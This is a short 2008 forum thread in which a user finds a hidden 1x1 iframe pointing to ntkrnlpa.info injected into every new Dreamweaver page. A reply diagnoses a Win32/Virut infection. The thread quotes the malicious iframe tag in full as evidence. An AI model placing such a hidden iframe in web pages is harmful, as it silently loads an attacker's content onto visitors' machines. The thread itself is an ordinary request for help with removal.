# ntkrnlpa.info iframe trouble



## munchman (Jun 28, 2008)

Okay. So whenever I make a new page in Dreamweaver MX, it always has an ifame pointing to http://ntkrnlpa.info/rc/?i=1. Most of the time, the cursor in WYSIWYG mode is in the middle of the tags so that any text that is inserted is not visible. How can I stop this from happening?


```
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"> </iframe>
```
:4-dontkno


----------



## munchman (Jun 28, 2008)

Anyone?


----------



## hapser (Apr 8, 2008)

Sounds like your infected with Win32/Virut.

If your using an Antivirus program you probly need a better one,
if not, then you need to get one and scan your system.


----------



## munchman (Jun 28, 2008)

Thanks. I have not updated AVG in a while. I'll try that. 

I googled that and apparently it isn't a nice thing. Is this true? Does norton have a link or anything?


----------

